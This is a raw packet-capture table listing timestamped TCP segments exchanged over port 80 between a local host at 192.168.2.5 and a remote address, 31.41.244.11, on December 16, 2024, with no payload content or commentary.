Dec 16, 2024 11:03:19.991421938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.992475986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.992532015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.123786926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.123817921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.123864889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.123897076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.124481916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.124499083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.124537945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.124555111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.125526905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.125586033 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.125649929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.125847101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.126678944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.126723051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.126754045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.126796961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.127823114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.127924919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.127964020 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.128065109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.128992081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.129082918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.129164934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.129209995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.130173922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.130191088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.130220890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.130244970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.131272078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.131329060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.131367922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.131411076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.132471085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.132515907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.132531881 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.132571936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.133606911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.133651018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.133699894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.133743048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.134787083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.134841919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.134850025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.134890079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.135958910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.136004925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.136014938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.136132956 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.137079000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.137191057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.137243986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.138307095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.138324976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.138361931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.138386965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.139385939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.139458895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.139513969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.139808893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.140659094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.140676975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.140714884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.140748024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.141746998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.141776085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.141820908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.142851114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.142894030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.142961979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.143004894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.144069910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.144088030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.144134045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.144159079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.145145893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.145207882 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.145251036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.145293951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.146322966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.146528959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.146550894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.146603107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.147438049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.147494078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.147881985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.147923946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.148710012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.148729086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.148765087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.148777962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.149805069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.149847984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.149898052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.149944067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.150962114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.151010036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.151108980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.151191950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.152132034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.152175903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.152221918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.152262926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.153242111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.153284073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.153383970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.153436899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.154510975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.154568911 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.154592037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.154635906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.155553102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.155612946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.155639887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.155682087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.156709909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.156781912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.156975031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.157033920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.157998085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.158041000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.158128023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.158169985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.159033060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.159076929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.159112930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.159322977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.160140991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.160216093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.160255909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.160815001 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.161348104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.161369085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.161413908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.162496090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.162539959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.162647009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.162698984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.163635969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.163691044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.163829088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.163883924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.164846897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.164899111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.164947033 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.166007996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.166024923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.166074991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.167100906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.167129040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.167174101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.168353081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.168370962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.168401003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.168425083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.169523001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.169539928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.169590950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.170550108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.170612097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.170655012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.170830965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.171788931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.171833992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.171871901 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.171916962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.173011065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.173027992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.173055887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.173084974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.174079895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.174138069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.174143076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.174184084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.175234079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.175328970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.175400972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.175448895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.176320076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.176371098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.176624060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.176671982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.177514076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.177575111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.177617073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.177762032 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.178721905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.178750038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.178771973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.178785086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.179864883 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.179912090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.179943085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.179989100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.180933952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.181040049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.181114912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.181163073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.182105064 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.182147026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.182225943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.182276011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.183252096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.183303118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.183378935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.183428049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.184389114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.184441090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.316091061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.316396952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.316493034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.316569090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.316616058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.316637039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.316684008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.317719936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.317819118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.317871094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.318897009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.318945885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.318968058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.319015026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.319974899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.320027113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.320142031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.320190907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.321096897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.321254969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.321302891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.322263002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.322309971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.322381020 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.322427988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.323416948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.323471069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.323510885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.323554993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.324651957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.324701071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.324712992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.324759960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.325756073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.326001883 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.326051950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.327009916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.327025890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.327053070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.327080965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.328202009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.328218937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.328267097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.329268932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.329437017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.329488993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.330440998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.330456972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.330490112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.330507994 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.331623077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.331682920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.331732988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.332706928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.332757950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.332860947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.332906008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.333884001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.333899975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.333949089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.335114956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.335130930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.335165024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.335191965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.336208105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.336323023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.336373091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.337390900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.337407112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.337455988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.338510036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.338562012 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.338591099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.338637114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.339646101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.339694977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.339771032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.339814901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.340783119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.340853930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.340879917 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.340926886 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.341944933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.341991901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.341995955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.342040062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.343117952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.343183994 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.343213081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.343256950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.344299078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.344353914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.344409943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.344458103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.345460892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.345573902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.345645905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.346541882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.346601009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.346647024 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.346688986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.349159002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.350281000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.350338936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.351453066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.351471901 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.351488113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.351501942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.351505041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.351532936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.351557016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.352097034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.352144957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.352574110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.352623940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.353579044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.353858948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.353908062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.354712963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.354729891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.354762077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.354780912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.355786085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.355806112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.355855942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.356671095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.356689930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:20.356719971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.356743097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:20.357047081 CET	80	49800	31.41.244.11	192.168.2.5
